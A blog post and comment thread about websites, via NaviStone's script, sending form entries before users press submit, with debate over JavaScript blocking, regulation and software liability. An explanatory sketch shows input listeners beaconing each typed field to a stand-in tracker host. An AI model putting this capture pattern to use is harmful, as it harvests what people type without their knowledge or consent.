Websites Grabbing User-Form Data Before It's Submitted

Websites are sending information prematurely:

…we discovered NaviStone’s code on sites run by Acurian, Quicken Loans, a continuing education center, a clothing store for plus-sized women, and a host of other retailers. Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.
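As a rough illustration of the mechanism described above (all names and endpoints below are hypothetical; NaviStone's actual code is not reproduced here), a tracker only needs an input listener and a beacon to exfiltrate a form field before the user ever hits submit:

```javascript
// Sketch of the pre-submit capture pattern. Pure helper: build the
// payload a tracker might send for one field. Field names, the
// endpoint, and the payload shape are all illustrative assumptions.
function buildCapturePayload(fieldName, value, pageUrl) {
  return JSON.stringify({
    page: pageUrl,
    field: fieldName,
    value: value,
    ts: Date.now(),
  });
}

// In a browser, the wiring would look roughly like this (commented out
// because it needs a DOM):
//
// document.querySelectorAll("input").forEach((el) => {
//   el.addEventListener("input", () => {
//     // sendBeacon queues the request even if the user closes the page.
//     navigator.sendBeacon(
//       "https://tracker.example/collect",
//       buildCapturePayload(el.name, el.value, location.href)
//     );
//   });
// });
```

The point of the sketch is how little is needed: no submit handler is involved at all, so closing the tab after typing changes nothing.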

This is important because it goes against what people expect:

In yesterday’s report on Acurian Health, University of Washington law professor Ryan Calo told Gizmodo that giving users a “send” or “submit” button, but then sending the entered information regardless of whether the button is pressed or not, clearly violates a user’s expectation of what will happen. Calo said it could violate a federal law against unfair and deceptive practices, as well as laws against deceptive trade practices in California and Massachusetts. A complaint on those grounds, Calo said, “would not be laughed out of court.”

This kind of thing is going to happen more and more, in all sorts of areas of our lives. The Internet of Things is the Internet of sensors, and the Internet of surveillance. We’ve long passed the point where ordinary people have any technical understanding of the different ways networked computers violate their privacy. Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.

Posted on June 29, 2017 at 6:51 AM • 51 Comments

Comments

Nick June 29, 2017 7:02 AM

So all you do is script up something that fills the form but doesn't post it. Lots of data.

Clive Robinson June 29, 2017 7:27 AM

As I mentioned the other day about having Javascript disabled, the final nail in the Javascript coffin, as far as I was concerned, was Google's auto-complete.

Other people really should think about turning Javascript off; when you do, quite often you get "dynamic advert free" browsing and less chance of contracting a nasty dose of malware.

However, pariahs that the marketing industry are, they have got alarmed at how their business model gets nuked by turning off Javascript. So they now arrange with site owners not to send the content you are interested in if you have Javascript disabled. Whilst it is annoying, I've stopped visiting most Javascript-required sites, and somehow I've found I don't miss them.

Bod Dylan's Beanie Cap June 29, 2017 7:29 AM

I know at least one website that is rumored to do this and justifies it on the basis that they use it to catch trolls and other people who violate their TOS using multiple identities. I don’t know that this justification makes it ethically any better but I do think it is important to realize that this practice isn’t always about the ability to monetize data.

matteo June 29, 2017 7:31 AM

I hate this kind of tracking, and it's pervasive.

@Nick
or… navigate with NoScript.
Anyway, I sometimes sent fake (but "valid") credit card numbers when spammers emailed me to steal info. That way they have to filter the invalid from the valid, which can't be automated.

matteo June 29, 2017 7:35 AM

@Clive Robinson
same here; if it asks for Javascript I quit (or I cheat).
For example, eBay put a big banner in the center saying "JavaScript needed for this site" and obscured the rest.
You could do nothing.
But I pressed F12, deleted the banner, and the site worked perfectly (even search worked).
They have since removed this antifeature,
but other websites are doing the same.

Anyway, everyone should have NoScript.

mk- June 29, 2017 7:52 AM

There are valid UX reasons for sending data typed by the user before an explicit 'submit' action, e.g. autocomplete. Let's not get paranoid; a lot of data about the user's environment is sent when the user merely hits the enter key in the URL bar. That's how HTTP works.

IMHO we should rather educate people to change their "expectation of what will happen" than fight with javascript. Possibly we can advise using software that blocks suspicious pages from even being opened (Google's Chrome is doing something like that).
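For contrast with the abuse in the article, the legitimate pattern mk- mentions can be sketched: an autocomplete client throttles keystrokes and sends only the query text, never the rest of the form. A minimal sketch with an injected clock so the logic is testable without timers (all names are hypothetical):

```javascript
// Throttled autocomplete sender: at most one request per minIntervalMs.
// `now` is an injected clock (a function returning milliseconds), which
// keeps the logic deterministic for testing.
function makeThrottledQuery(minIntervalMs, now) {
  let lastSent = -Infinity;
  return function maybeSend(query) {
    const t = now();
    if (t - lastSent < minIntervalMs) return null; // too soon, skip
    lastSent = t;
    // Only the search text leaves the page, not other form fields.
    return { endpoint: "/autocomplete", q: query };
  };
}
```

The design difference from the tracking case is the scope of what is sent: the query box's own text, for the user's immediate benefit, rather than every field on the page for the site's later benefit.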

Scott Lewis June 29, 2017 7:56 AM

Mk, there are valid reasons. But the use of that data to build up contact information and send unsolicited email, for example, is not a valid reason.

AgentZico June 29, 2017 8:13 AM

Even though I have used and still use JavaScript, one of the first things I do before surfing on any smart mobile device is to… TURN OFF JAVASCRIPT in browsers. It's like preventing headaches before they come.
Also, it’s almost always about one thing with those at the other end of data retrieval…MONEY.
If they don’t use it themselves, they sell the data to those who’ll use it.

Rachel June 29, 2017 8:15 AM

Whilst it is annoying, I’ve stopped visiting most Javescript required sites, and somehow I’ve found I don’t miss them

I keep Javascript off but, as you say, sometimes it is necessary to use a site and it's impossible without it. As mentioned before, another reason to cheer Bruce for maintaining a most functional, trim site.
The Ethereum article you probably didn't read, courtesy of 'Bloomberg' (I suppose a US rag), had one of the more obnoxious examples of Javascript I've experienced for a while. When moving the mouse to scroll down whilst reading, without warning the page would scroll left and right, obscuring the article one was absorbed in and opening large side panels of unnecessary graphic displays. I wondered if it was possible for Bruce to link us to text-only versions of such articles, but they surely only exist in the one place, anything else being a breach of copyright.

mk- June 29, 2017 8:16 AM

@Scott well, is it a real-world scenario: users who type in their personal data but then change their mind and don't explicitly submit it? I mean, I wouldn't care about them when building up my database for sending unsolicited emails 😉

Dr. I. Needtob Athe June 29, 2017 8:19 AM

“But it’s too late. Your email address and phone number have already been sent to a server at “murdoog.com,” which is owned by NaviStone, a company that advertises its ability to unmask anonymous website visitors and figure out their home addresses.”

For what it’s worth, I’ve added these lines to my hosts file:

0.0.0.0 murdoog.com
0.0.0.0 www.murdoog.com

Will that help?
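It can help, with caveats. Hosts entries take bare hostnames, not URLs (so a line like `0.0.0.0 http://www.murdoog.com` is ignored), and each subdomain needs its own line. A small Node sketch that generates such lines from a blocklist; `murdoog.com` is the domain named in the article, and the helper name is hypothetical:

```javascript
// Emit hosts(5) sinkhole lines for a list of tracker domains, covering
// both the bare and "www." forms of each domain. Assumes the input
// domains do not already carry a "www." prefix.
function hostsLines(domains) {
  return domains
    .flatMap((d) => [d, "www." + d]) // bare and www forms
    .map((h) => "0.0.0.0 " + h)
    .join("\n");
}

console.log(hostsLines(["murdoog.com"]));
```

Note the limits: this only covers domains you already know about, and only for software that respects the hosts file; a tracker served from a first-party or freshly registered domain sails right past it.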

Parabarbarian June 29, 2017 9:25 AM

Javascript: Extending user friendly surveillance to every corner of the Internet.

Unfortunately, the popular web development platforms rely heavily on javascript to make their pages look “pretty”. Some to the point that a page will not render without it. This trend will only accelerate as HTML5 becomes more pervasive.

Give a programming language the ability to violate your privacy and someone will pay a programmer to use that power.

For the time being, get Noscript and Privacy Badger. Not perfect but they help.

TimH June 29, 2017 10:07 AM

I was checking out on Sears.com a few days ago and was asked for an email address before getting the total with shipping. Shipping was prohibitive, so I stopped there and closed the browser. Less than a day later, spam from Sears. OK, so it was easy to do the unsubscribe, but the auto-subscribe-to-spam feature was rude, and it certainly puts me off buying from them.

On a similar note, I'm amazed how few sites still allow purchase as a guest. Who wants to set up yet another fsking account just to buy something?

FXL June 29, 2017 11:22 AM

I implemented a system like this for a marketing company in 2004. It captured email addresses from shopping cart signup pages regardless of whether the user hit the submit button, and followed up with a reminder email if the user had not made the purchase within an hour or so.

I’m surprised people are just noticing this now.

Iggy June 29, 2017 12:19 PM

I, too, am grateful to Bruce for keeping his site friendly, clean and elegant.

I've used NoScript and CCleaner for many years, and while I allow as few scripts as possible, it's not perfect, largely because of me: I sometimes guess which script is OK, and sometimes I say "oh, the heck with it" and allow some I'd rather not in order to get to the content. But now I've received confirmation of something I've suspected has been happening at Amazon for many years (yet another reason I don't do business there anymore and don't miss that pseudo-state at all), and it further validates my less-is-more and fake-ID attitude toward data sharing.

Just because I’m paranoid doesn’t mean I’m not being followed.

chris June 29, 2017 12:41 PM

Some time ago I noticed that the Google password strength estimator transmits every key press to show you a nice red or green bar. This estimator is a widget you can add to your site to improve "security". Maybe it does more good than harm. But I don't like it.

I hope you never entered a password and thought: ‘Oh. I use that password already for $importantService. I’d better use BatteryHorseStapleCorrect! So they won’t know…’.
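chris's point is worth dwelling on, because strength feedback does not require sending keystrokes anywhere: a meter can run entirely in the page. A deliberately crude local estimator follows; real meters such as zxcvbn are far more sophisticated (dictionary checks, patterns, keyboard walks), so this function is illustrative only:

```javascript
// Naive local password-strength estimate: length times log2 of the
// character-pool size implied by the classes present. Runs entirely
// client-side; nothing leaves the page.
function estimateBits(password) {
  let pool = 0;
  if (/[a-z]/.test(password)) pool += 26;
  if (/[A-Z]/.test(password)) pool += 26;
  if (/[0-9]/.test(password)) pool += 10;
  if (/[^a-zA-Z0-9]/.test(password)) pool += 33; // printable symbols
  return pool ? Math.round(password.length * Math.log2(pool)) : 0;
}
```

Wiring this to an `input` event and coloring a bar red or green needs no network request at all, which is exactly why transmitting every keystroke for the same feature raises eyebrows.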

CallMeLateForSupper June 29, 2017 12:47 PM

@TimH

There is a bright side re: your sears[dot]com experience: Sears is circling the bankruptcy drain right now. The closing of tons of Sears stores – my local one among them – was in the news (last week?).

Ross Snider June 29, 2017 1:00 PM

This is the ultimate indication that Free Software has failed.

We're asking for regulatory bodies to please constrain what private companies do with secret code. The problem that immediately becomes apparent is that regulatory bodies do not understand code. They also do not function in a scalable way that can handle large amounts of code review (anyone on this blog should know how long that takes to do).

Calling for a regulatory body to do this is asking for the companies to regulate themselves.

Here's a better (more scalable) idea: open companies up to lawsuits if they break expectations, including of privacy but also of security. Once a large body of case law has been established, make certain practices ("dark patterns") illegal and let companies and their developers face fines, revocation of license, and jail time if they break the law (severity, etc. accounted for by the justice system and due process).

Mandate that the behavior of systems be inspectable and modifiable by consumers. Allow them to file suit if they feel that they are being mistreated. This isn't some extreme view; it's the foundation of our political system.

Clive Robinson June 29, 2017 1:21 PM

@ CallMeLateForSupper,

Sears is circling the bankruptcy drain right now.

Which is bad news re personal information.

This has happened before so we should be aware of it but often we are not.

If a company has an internal sales database that it has stuffed with what it considers "internal sales notes" never meant to see the outside world… if the company becomes bankrupt, that database and everything in it becomes "an asset" for the receivers to sell at maximum value for the creditors. Thus your data, and some comments from a sales droid about you that are not complimentary because you got upset when they delivered late etc., become something to be sold endlessly…

It’s just one of the reasons I don’t do online shopping and prefer to go to a shop and pay cash.

The one time I did try was with Amazon, and they so badly screwed things up that I let people know just how bad they can be… And as they took money they have not returned, I consider them thieves as well.

R00KIE June 29, 2017 1:43 PM

“Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.”

This is true: governments should step in, but the question is, do they want to? Can anyone say with a straight face that their government is not eager to spy more on its citizens and control their lives more? A few vulnerable IoT devices and badly coded websites can be handy in collecting some more information on the populace.

There is also the matter that most of the people in power, and thus those approving new laws, are computer illiterate; we see examples every day, such as the encryption backdoor law ideas. Do I need to say more?

albert June 29, 2017 1:59 PM

@Bruce,
“…Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs….”

I agree, but unfortunately, as bad as it was under the former administration, 'Government regulation' now needs to be moved to my oxymoron list. 'Government' likes the data, but the Corporatocracy makes money with it; it's a win/win for them and a lose/lose for us.

@Others,
I thought that there were -valid security- reasons for avoiding JavaScript, not just abuse by corporations.

“When new technology can be abused, it will be abused, and in the shortest possible time.”

Many websites -require- JavaScript to run, like your bank's website. If you run Firefox, you can try 'View, Page Style, No Style'. Old versions of Opera had a single-key JavaScript disable/enable, until they drank the Chromium-aid (why would Google ever want to let users do that?).

Class action suits against offending companies are a good idea, but we need -laws- to do that. We don't have them yet.

When the corporations and their congressional representatives suffer enough from an insecure system, then things might change.

. .. . .. — ….

Mike Gerwitz June 29, 2017 2:01 PM

This type of thing was discussed back in 2013, when Facebook was doing research on self-censorship by tracking whether users had typed messages but didn't submit them. But they didn't track the content of the messages:

https://arstechnica.com/business/2013/12/facebook-collects-conducts-research-on-status-updates-you-never-post/

As many other commenters here express concern for: JavaScript programs are just that—programs. Your web browser is downloading and automatically executing untrusted, ephemeral JavaScript without your knowledge or consent. For those looking for more information: I’ve given two talks touching on this in the past two years at LibrePlanet: one details many of the ways that you can be tracked online (and otherwise have your privacy violated), and another touches on the issue as it relates to software freedom. Slides for the former contain numerous references so you can do your own research. The bibliography is available in BibTeX format. I hope some here will find it useful.

Clive Robinson June 29, 2017 2:11 PM

@ Ross Snider,

This is the ultimate indication that Free Software has failed.

NO, it’s a sign that the whole software industry has failed to mature as other markets have done.

You may not be aware of the history of steam boilers in the United Kingdom in the Victorian era, but it's an object lesson in why the software industry has failed.

The important difference is that when Victorian boilers went wrong things became kinetic, and death and injuries were part of that. Whereas most software, when it goes wrong, only kills you a little bit, with the stress hormones hardening your arteries etc.

It was the needless death and destruction from boiler explosions that caused Parliament to act, and regulations were brought in about testing, certifying and maintaining boilers. Boiler making moved from being an artisanal craft skill of blacksmiths to what became engineering, through the application of the scientific method.

In the UK today it is obvious to anyone with eyes to see or ears to listen that the old Victorian habit of turning a blind eye to danger has not gone. More than a year ago there were very serious warnings from senior fire officers about the fire safety of cladding being put up on tower blocks; they were totally ignored. Until, a few days ago, a tower block in London went up like a signal fire and many were killed. Only now is it being discovered that of the nearly 150 tower blocks tested in the past few days, 100% fail basic fire safety tests with respect to the cladding. This is being politically portrayed as unexpected, despite the repeated warnings of experts.

Despite many, many warnings, it is only now, after so many deaths, that the profiteers are scrabbling around and actually paying some notice to what they should have at least a decade ago. Worse, the current UK Prime Minister, as Home Office Minister, turned a blind eye to all the warnings, and she's pretending it was not on her watch.

The lesson from this is that the only way the software industry will cease to be a bunch of mainly incompetent artisans and actually become real engineers is when a large number of people die in one large headline-grabbing incident. Until then, profit and blind eyes will rule the day.

The thing about "Free Software" is that often, but not always, the source is available, directly or indirectly, which is really the Closed-v-Open argument, not the Free-v-Paid argument. The Free-v-Paid difference generally only comes to light through litigation, where people ask for compensation and discover they have no rights or standing etc.

The software industry needs to change: people need not only to accept responsibility but to be capable of acting responsibly. Few current software coders are capable of acting responsibly, because they have neither the training nor the time to do so. Thus it is more of a management issue, and for that to change, senior managers need to start seeing the inside of prison cells for extended periods and have their assets taken away to give compensation. Only then will they behave responsibly and encourage those below them to act responsibly. The downside, of course, is that many will become unemployed in the process, and the fast pace of change will come to a shuddering halt, followed by what will seem like a snail-like pace for years to come.

It’s something that needs to happen urgently, but won’t till there is a pile of around a hundred corpses with grieving family and friends demanding justice.

Major June 29, 2017 2:51 PM

@Ross

I don’t understand how any of this adds up to “Free Software has failed”. I am running my free operating system, with my free programming languages and free apps like the kick ass mathematics system Sage that beats any paid software that I am familiar with hands down, and nothing is failing me. I even get a ton of free cloud processing. I have never been successfully hit by malware. I realize both paid and unpaid software and services might be collecting data on me so I take countermeasures like not putting confidential code on the cloud, encrypting data and monitoring what goes in and out of my network. Any failure seems like a consumer side problem to me…

I think suing people for my ignorance is an inefficient way of addressing… my ignorance. Anybody paying any attention sees web sites responding to their keystrokes, so obviously they are being processed. Anybody paying any attention knows that companies are extracting as much personal data as possible, so it is quite possible that any entry is being stored. Sure, shame companies for being sneaky. Publicize the issues. But a lawsuit? This is unlikely to benefit anyone but lawyers except in the most egregious cases. By the time a suit is resolved the harm is done and the industry has moved on to new tricks.

And what does this have to do with Free Software? Security and privacy issues occur with both free and proprietary software, but free software, being open source, makes the issues easier to find and to fix. And free software makers have less incentive to cheat and trick their users and less ability to hide what they are doing.

In a world with less and less need for employees and more and more people, we better find some way to satisfy needs for free. Telling programmers who are happy to contribute free code to shove it only serves those that want to squeeze the average Joe dry so they can selfishly thrive.

Major June 29, 2017 5:09 PM

@Clive

Fining or putting somebody in jail for writing flawed software makes as much sense to me as fining authors for bad books or jailing scientists for incorrect results. It certainly is a way to discourage people from writing software, which I don’t think is in anybody’s interest, as it will inevitably reduce innovation and the availability of software. And really, flaws are subjective and technical. People could easily lose cases simply because the court or jury couldn’t keep up. And the cost of successfully defending yourself is punitive in itself.

As a universal principle, I think treating software errors as crimes only benefits lawyers and trolls. Market and journalistic/informational forces work well enough to police most types of software, as long as users take their share of responsibility. For example: if you know IoT devices are flawed and you still connect them to the net, it's nobody's fault but your own. If you know how Facebook operates and you still use it, whose fault is that?

I am proud of the code I write, but I am not grandiose enough to think it's flawless. Flawless code is incredibly difficult to write. For most uses the cost of perfect code is several orders of magnitude more than the cost of "good enough" code. There are exceptions where the cost is worth paying (life and death situations), but in general I believe the user should be responsible for due diligence. The user should understand the risks and limitations and take the appropriate remedial actions: backups, care in accessing programs from the internet, NoScript, antivirus, network monitoring, encryption, redundancy, etc. all work. I have used computers extensively, and despite occasional problems I have never been severely impacted (except through my own error), because I take ultimate responsibility for what I am doing and I am willing to recognize when I am at fault.

albert June 29, 2017 6:03 PM

@Clive,

“…It’s something that needs to happen urgently, but won’t till there is a pile of around a hundred corpses with grieving family and friends demanding justice….”

I certainly hope something is done regarding enforcement of fire regulations in the UK.

Other than the Therac-25 case, I know of no incident of software failure causing death, but that doesn't mean none have occurred. The way I see it, we've had so many hacking incidents causing ruined lives and billions of dollars in damage that it would seem the system needs an overhaul. I know a lawyer who needed two years to recover after her identity was stolen. What are po' folks to do?

Deaths due to poor software might only affect that particular application or application area, whereas the whole system is broken. I fear we’ve advanced too far, not in technology, but in the frantic race to computerize everything. The vast majority of people don’t really have any idea about how these things work, the ones on their laps or in their pockets, not to mention the ‘black boxes’ hidden in almost everything.

We are in the epoch where abuse of technology has outpaced the advancement of technology. I’m not a futurist, so I won’t speculate.

I’ll leave that to folks like Orwell.
. .. . .. — ….

John Smith June 29, 2017 8:25 PM

@Major:

“Fining or putting somebody in jail for writing flawed software makes as much sense to me as fining authors for bad books or jailing scientists for incorrect results. It certainly is a way to discourage people from writing software…”

Those that can be discouraged, should be discouraged.

tyr June 29, 2017 8:53 PM

I'm kinda bemused by the idea of users
due diligence when it’s fairly obvious
that most have no clue about what is
in control of some part of their lives
through software. If you ride in an
aircraft are you a user. If you drive a
car through a modern highway system
are you a user. Most of the modern
world is an interlocking mess of poorly
understood software and hardware of
which the interNet is a minor case in
the wormcan we have built. I have
worked with competent and trying to
be responsible programmers who were
able to create barely mitigated kinds
of disasters for other people because
of their school training which did
not include any moral training as to
how far their responsibility to others
extended. Expecting every layman to be
the one who has to become a highly
trained expert who vets everything in
their life is impossible to attain.

Blaming the end user for a broken way
of a culture will not fix any problem
caused by dangerous software practices
instituted by bean counter nitwits.

James June 29, 2017 9:46 PM

“Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.”

It would be very unfortunate if the best or only hope for improvement was for the decision makers in the government to put what is good for everyone ahead of their own interests. We see (and expect) decision makers in the private sector to focus on their own interests without regard to what is good for everyone else. I doubt that decision makers in the public sector will behave much better.

In any case I don’t see how regulation can be an effective solution. Banks, for example, are highly regulated compared to other industries. Banks sometimes apply fees and penalties in error. If the account holder points out the mistake, the bank will nearly always correct the error but sometimes they do not. When the bank refuses to correct an erroneous bad check fee after multiple requests, the customer’s best recourse is not to call some regulator. The best course of action is to change banks.

Ross Snider June 29, 2017 11:05 PM

@Major

“Free” = Libre, not Gratis

Free Software != Open Source Software. Common misconception.

Free Software means that software is shared and traded between people, and that at all times the software’s behavior is inspectable and modifiable and that these changes can in turn be published, inspected and modified.

The current industry is so far from this that the prescribed solution by Schneier is for there to be centralized regulation by a body that clearly will never know how to perform code reviews. If you've ever worked in the software industry (I hope those commenting on this blog have), the regulation of the industry today is close to a joke. The standard industry practice is to create evidence that certain properties of the software are true and assert it to auditors, but the auditors are in general not enabled to actually discover the properties of the subjects they are auditing. The auditors do not understand code or networking; they have a checklist of things they must be convinced of, and the industry hires some people to become convinced of it and in turn convince the auditors.

In my tour in the industry I've seen every compliance professional who has loudly proclaimed, with evidence, that we are not yet compliant with regulations quietly retire with a severance package. Every single one. Try convincing your software company, or its compliance and regulation folk, that it isn't compliant with an important standard or regulation, and won't be without years of work and millions of dollars of investment. (I dare you.) Even with a compelling argument, I guarantee you will fail. Your compliance team will find a way to argue that what you have is "good enough".

I don’t know if Schneier has experienced this himself, but my experience in the industry (multiple Fortune 500s) has led me to understand that regulatory auditors are not sufficiently armed to actually regulate large software companies. They come in as teams of less than a dozen for a week at a time, spend half their time with marketing and management and the other half with parts of the organization that vouch for but do not understand the properties and controls inherent to the product. The auditors leave with promises about the state of the product from people who actually don’t really know any better. Everybody leaves happy.

Within the ideal of Free Software, in a market system where companies can be sued by consumers for breaking their privacy and security expectations, the outcome looks a hell of a lot different from the diatribe above. And yeah, there's a bit of hyperbole in calling it "failed".

Anyway, my recommended solution to this problem is:

1) Free Software culture

2) more transparency for customers on what software is actually doing (open sourcing, creating "product labels" like we have for food, BBB support for software behavior)

3) A consumer rights push (a la Ralph Nader) on the effects of malicious software practices

4) A real stick on companies: possibility of fines, jail time, market loss

I don’t believe that “regulation” will scale. At least, not if it is of the kind where auditors come in with a checklist.

Clive Robinson June 30, 2017 2:50 AM

@ Major,

Fining or putting somebody in jail for writing flawed software makes as much sense to me as fining authors for bad books or jailing scientists for incorrect results

The law is in essence about "harms", both in remedy and, less so, in prevention. Harms caused to an individual or group are normally considered criminal conduct; those of contracts and torts, civil. In the former case custodial sentencing is the norm, with asset seizure and fines being part of the remedy. Civil cases are mainly about fines.

As I pointed out I was talking about the inevitable case of harms against the person, which would be subject to criminal sanctions, thus custodial sentencing.

Currently we have a problem in that governments consider large fines against corporates as a way to raise revenue; thus Corporate Liability by individual Officers is lost, and, as we have seen with the banks, it just becomes a game of chance where those making profits and thus large bonuses do not change their risk-seeking behaviour. This is not what you want to happen in an industry which is just about to launch into a phase where lives will most definitely be at risk, with autonomous vehicles.

The simple fact that you appear to be ignoring is that in all other engineering domains engineers understand both risk and responsibility; their behaviour is most definitely not artisanal. That is because there are vast piles of legislation on safety and function, with similar quantities of internationally agreed standards that have to be explicitly complied with.

As we have seen, there are no real software standards that affect final product functionality; they are at best discretionary and generally only come up with interoperability issues. Worse, many major software houses have seen, and still see, standards such as file formats as a way to achieve "lock-in", and thus change them with every release to stop products from other organisations working, or, as the execs see it, "infringing". This is not a route to stability and efficient working, and in fact it ends up harming the practicing organisations themselves, as their own software core has to be endlessly reworked, adding more bugs and vulnerabilities and harming their own product and reputation. Microsoft appears to have realised this and mostly keeps its lock-in behaviour at the UI these days, which means the core tends to become stable (hence the XP problem we are currently debating on another thread).

The point is that until there are real compliance standards with real enforceability, software will be "Art", not "Science", produced by the equivalent of marketing copywriters, not engineers. If you can live with that in your self-driving car or medical implant, ask your relatives if they could.

As far as I am concerned, many "software engineers" are committing a fraud; they are not, nor can many of them ever be, engineers in the meaning of "engineering disciplines".

Bong-Smoking Primitive Monkey-Brained Spook June 30, 2017 3:37 AM

@Clive Robinson,

they are not nor can many of them ever be engineers in the meaning of “engineering disciplines”.

Not surprising! When I was in college in the Electrical Engineering program, students who failed the program transferred to the computer science department and became “A” students. Those who failed computer science went to Software Engineering (a new discipline at the time) and made it 🙂

Nothing against computer scientists or software engineers. Our brains are wired differently. Case closed.

Dan H June 30, 2017 7:04 AM

“Those who failed computer science went to Software Engineering”

I recall a lawsuit over a decade ago against everyone calling themselves engineers. There were sanitation engineers (janitors), domestic engineers (moms), everyone had to be an engineer. The courts found that being an engineer was a professional designation that required a proper education, licensing, etc., but they couldn’t prevent mom from calling herself a domestic engineer if she chose to do so.

Today we still have engineers. MCSE. Microsoft Certified Systems Engineer. Although one doesn’t even need to attend a technical college to become an “engineer.”

The same is true of software engineers. Rarely is someone called a computer programmer; they’re a software “engineer.” I do realize there is a difference: one just “codes” while the other “architects.” Yet there are estimates that 40% of software professionals don’t have a college degree (I’d guess it is higher). If you are going to be an “architect,” shouldn’t there be a formal education and licensing? Not everyone can design a new high-rise building without going to college.

Perhaps if there were a formal software engineering discipline, in the same vein as electrical engineering, that required people to have a degree, become licensed, and take continuing education, there would be more secure software. This will never happen, and everyone will continue being an MCSE and a software engineer.

Major June 30, 2017 12:45 PM

@Ross (and to some extent @Clive)

Yes, I was thinking of free as “libre”. I do not see any significant difference between “libre” as you describe it and what is generally called “open source”.

I worked as a consultant for years and have been through many companies’ code. Not so shockingly, the code all had flaws, most of which did not significantly harm its usefulness.

Programming in general is artisanal, at least at this point in its development. It is a very young field. Real time systems in critical applications need to be pure engineering, and probably boring and far from artisanal. Which is fine, but it is artisanal programmers who invent the verifiable languages, the proofs, and the static and dynamic analysis tools that allow real time systems to be created safely. The edge is going to be artisanal. When it is well understood and boring compliance engineers can take it over while creative programmers move on to the next edge.

Really what is engineering except utilization of science once the science has been well understood?

I really don’t follow your argument. You seem to be describing the uselessness of all the regulation and auditing you have experienced while at the same time recommending more. I am not saying that fraud or deception should not be punishable, but holding software developers to unrealistic and largely inefficient standards, despite the fact that they readily admit their code is not perfect, is just silly make-believe that can do nothing more than stunt the industry, and effectively stunt the progress of every field that uses computers. The first versions of anything interesting will have significant flaws. No flaws means no innovation.

And really I would like to see a set of unambiguous standards that ensure that code is secure or accurate. Standards that actually can be reliably applied and whose application can be verified. And who would determine these standards are correct?
Ultimately politicians or bureaucrats who know nothing about the subject, no?

Reasoning about programs is incomplete à la Turing, so I doubt standards could do more than specify that a certain number of hours or employees need to be applied to testing, which we all should know proves nothing.

As far as privacy goes: we can’t get people to stop using applications that THEY KNOW don’t respect their privacy. If people don’t take responsibility for their own privacy, it seems hypocritical to me for them to complain, and even more ludicrous for them to press charges. Somebody who dances on a dark road, blindfolded and dressed in black, has little cause to sue the driver who hits them.

ab praeceptis June 30, 2017 1:22 PM

Clive Robinson, Bong-Smoking Primitive Monkey-Brained Spook

I’ll keep this short so as to stay well below my trigger level (reaching it, I would have to get a good assault rifle and lots of ammo to clean at least our region from all the ‘ux engineers’, ‘web dev. engineers’, and lots of other dangerously incompetent and often imbecile creatures).

Let me correct you with at least one example, myself, and restore some honour that (granted, often justifiably) was lost. I have been doing electronics since I was 10 or so (some might remember the Philips electronics kits, one of which I got because it was hoped it would keep me busy *g), and I finally ended up as a software engineer. By coincidence, btw., but it was only possible because that field held promises electronics couldn’t deliver any more by then.

I think the decisive difference isn’t hardware vs software but two factors: a) a way of thinking and b) a hands-on desire. And the way of thinking must understand, value, and be based on math. Another attribute I usually noted with good engineers is that they keep effort vs. gain in mind, as well as an unwillingness to make foul compromises.

If pressed to boil it all down to 1 single point, I’d say that an engineer thinks in terms of a system, a part of which will be what he creates, hence (s)he will always look carefully at the context.

Finally, I’d like to somewhat defend our many, many lost sheep colleagues out there: The quality of the engineers of a society is much bounded by the educational system and self-understanding of that society. With usually lousy universities and in dumbed down pure consumer societies, oh well …

mutley dastardly June 30, 2017 2:10 PM

I’m looking for blacklists, to import into my webwall.
Let’s just get rid of those incorrect websites. Privacy, the right to be wrong, and the right to correct those postings are too expensive to leave to lawyers.

Clive Robinson June 30, 2017 2:41 PM

@ Major,

And who would determine these standards are correct?
Ultimately politicians or bureaucrats who know nothing about the subject, no?

I can’t answer for the peculiar US standards systems, as the ones I’ve had to deal with are mainly “arse about face” and often show that there is bad political patronage at the senior levels setting direction (see the latest from the EPA on climate change to see the lunacy of this process).

In Europe and at the UN, standards are generally set in three steps, first identified by the British Standards Institute a very long time ago.

They work with both industry and politicians in a back-and-forth manner to establish whether there is a requirement for a national or international standard. They likewise work with industry bodies who feel their standards could benefit the nation or nations, but further down the line.

When a need is recognised, they propose a framework if the standard is to be part of legislation. The legislators then draw up the framework in legal form and put it through the legislative process. The chosen standards body then assembles a team of experts, usually from the interested industries, plus an administrative technical lead reporter/secretary who is from the standards organisation and acts as an expert secretary and editor. The technical experts draw up requirements and work their way through, tying where possible to existing standards, usually in the area of metrology (the science of measurement). Politicians have no input at this level, so interference is usually minimal. When the standard reaches an appropriate state of agreement, it is put up as a draft for comment. Sometimes this part of the process causes major changes, in which case a new draft is drawn up. Eventually the standard gets voted upon, and if it passes it becomes a formal standard.

Larger international standards bodies do have political input via technical representatives at the highest levels, especially when dealing with a shared resource like the electromagnetic spectrum and communications, and similar interfaces between national standards (think old phones as an example). These generally don’t happen that often, hence the problems at the last ITU gathering: the Internet had happened in between, and various governments wanted to carve things up in different ways, amongst much animosity.

In general, though, non-US standards are less prescriptive; that is, they will say “less than x parts per million”, whereas US standards have a habit of saying “Using test procedure XYZ, test for less than x parts per million”, and that gets enshrined in legislation. Which is really not a sensible way to go about things if you take the long view, because it’s too rigid, quickly becomes out of date or outmoded in other ways, and is extraordinarily slow to change, as well as opening up opportunities for legislators to abuse the process in various ways…

But software is a major issue: it has no real existing standards outside of language definitions. This is because there are effectively no existing measurands that can be used to check against.

Thus we are in danger of getting standards by case law, which is most definitely not the way we want to go, as it is liability/blame driven after a harm. That involves a court determining the “Golden Thread” to establish “Reasonable Behaviour”, which in turn means establishing a “Directing Mind” and forensic analysis, which is very bad news. Forensics’ basic premise is the reverse of that of science: it goes backwards in time and is mainly untestable, and usually not repeatable.

That is, forensic practitioners argue backwards from a known effect to what the lawyers and experts agree is the probable cause, based only on opinion, which history shows is frequently wrong. Science almost always goes from cause to effect, as that is reliably testable as it moves forward in time and, importantly, is repeatable.

Anon June 30, 2017 3:20 PM

@Major

Reasoning about programs is incomplete à la Turing, so I doubt standards could do more than specify that a certain number of hours or employees need to be applied to testing, which we all should know proves nothing.

AARGH.

Turing didn’t say “we can’t decide if a program halts.” He said “we can’t decide if an arbitrary program halts.” There are a great many programs that we can prove will halt. If we depend on a program halting, we should write one of those.

